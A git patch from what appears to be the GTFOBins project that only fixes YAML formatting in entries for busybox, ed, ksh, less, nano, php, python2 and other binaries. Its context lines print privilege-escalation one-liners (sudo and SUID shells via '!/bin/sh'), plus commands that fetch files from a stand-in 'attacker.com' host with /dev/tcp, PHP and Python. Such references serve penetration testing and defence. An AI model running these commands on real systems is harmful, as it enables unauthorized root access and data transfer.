From b96f6e9a491a6d66f948ebb28510526772736f26 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Fri, 1 Jun 2018 00:20:23 +0200 Subject: [PATCH] Fix YAMLs format --- _gtfobins/busybox.md | 8 ++++---- _gtfobins/ed.md | 2 +- _gtfobins/ksh.md | 2 +- _gtfobins/less.md | 2 +- _gtfobins/mail.md | 2 +- _gtfobins/man.md | 2 +- _gtfobins/more.md | 2 +- _gtfobins/nano.md | 2 +- _gtfobins/php.md | 2 +- _gtfobins/pico.md | 2 +- _gtfobins/python2.md | 2 +- 11 files changed, 14 insertions(+), 14 deletions(-) diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md index 4d0116c..dc295fc 100644 --- a/_gtfobins/busybox.md +++ b/_gtfobins/busybox.md @@ -17,8 +17,8 @@ functions: LFILE=file_to_write busybox sh -c 'echo "data" > $LFILE' upload: - - description: Serve files in the local folder running an HTTP server. - code: | - export LPORT=12345 - busybox httpd -f -p $LPORT -h . + - description: Serve files in the local folder running an HTTP server. + code: | + export LPORT=12345 + busybox httpd -f -p $LPORT -h . --- diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md index ed03c3a..2d9dc16 100644 --- a/_gtfobins/ed.md +++ b/_gtfobins/ed.md @@ -9,7 +9,7 @@ functions: sudo ed !/bin/sh suid-limited: - - code: |- + - code: | ./ed !/bin/sh file-read: diff --git a/_gtfobins/ksh.md b/_gtfobins/ksh.md index 7238cb3..85fe375 100644 --- a/_gtfobins/ksh.md +++ b/_gtfobins/ksh.md @@ -29,7 +29,7 @@ functions: 3<>/dev/tcp/$RHOST/$RPORT \ | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. - code: |- + code: | export RHOST=attacker.com export RPORT=12345 export LFILE=file_to_get diff --git a/_gtfobins/less.md b/_gtfobins/less.md index 19d1262..f8b34ce 100644 --- a/_gtfobins/less.md +++ b/_gtfobins/less.md @@ -12,7 +12,7 @@ functions: sudo less /etc/profile !/bin/sh suid-limited: - - code: |- + - code: | ./less /etc/profile !/bin/sh file-read: diff --git a/_gtfobins/mail.md b/_gtfobins/mail.md index dbead6d..d84afa6 100644 --- a/_gtfobins/mail.md +++ b/_gtfobins/mail.md @@ -9,7 +9,7 @@ functions: sudo mail -f /etc/hosts !/bin/sh suid-limited: - - code: |- + - code: | ./mail -f /etc/hosts !/bin/sh --- diff --git a/_gtfobins/man.md b/_gtfobins/man.md index 23e60ee..43814c7 100644 --- a/_gtfobins/man.md +++ b/_gtfobins/man.md @@ -9,7 +9,7 @@ functions: sudo man man !/bin/sh suid-limited: - - code: |- + - code: | ./man man !/bin/sh file-read: diff --git a/_gtfobins/more.md b/_gtfobins/more.md index e575f8f..aabf5c9 100644 --- a/_gtfobins/more.md +++ b/_gtfobins/more.md @@ -9,7 +9,7 @@ functions: TERM= sudo -E more /etc/profile !/bin/sh suid-limited: - - code: |- + - code: | TERM= ./more /etc/profile !/bin/sh file-read: diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md index bb73fb2..f4895e1 100644 --- a/_gtfobins/nano.md +++ b/_gtfobins/nano.md @@ -20,7 +20,7 @@ functions: ^T suid-enabled: - description: After running this exit the editor to see the command output. - code: |- + code: | COMMAND=id TF=$(mktemp) echo $'#!/bin/sh -p\n'"$COMMAND" > $TF diff --git a/_gtfobins/php.md b/_gtfobins/php.md index 7934db3..b44ba4f 100644 --- a/_gtfobins/php.md +++ b/_gtfobins/php.md @@ -35,7 +35,7 @@ functions: php -S $LHOST:$LPORT download: - description: Fetch a remote file via HTTP GET request. - code: |- + code: | export URL=http://attacker.com/file_to_get export LFILE=where_to_save php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md index 42656f4..24c9ff4 100644 --- a/_gtfobins/pico.md +++ b/_gtfobins/pico.md @@ -20,7 +20,7 @@ functions: ^T suid-enabled: - description: After running this exit the editor to see the command output. - code: |- + code: | COMMAND=id TF=$(mktemp) echo $'#!/bin/sh -p\n'"$COMMAND" > $TF diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index d2cfa3d..e9cc15c 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md @@ -18,7 +18,7 @@ functions: python2 -m SimpleHTTPServer $LPORT download: - description: Fetch a remote file via HTTP GET request. - code: |- + code: | export URL=http://attacker.com/file_to_get export LFILE=where_to_save python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'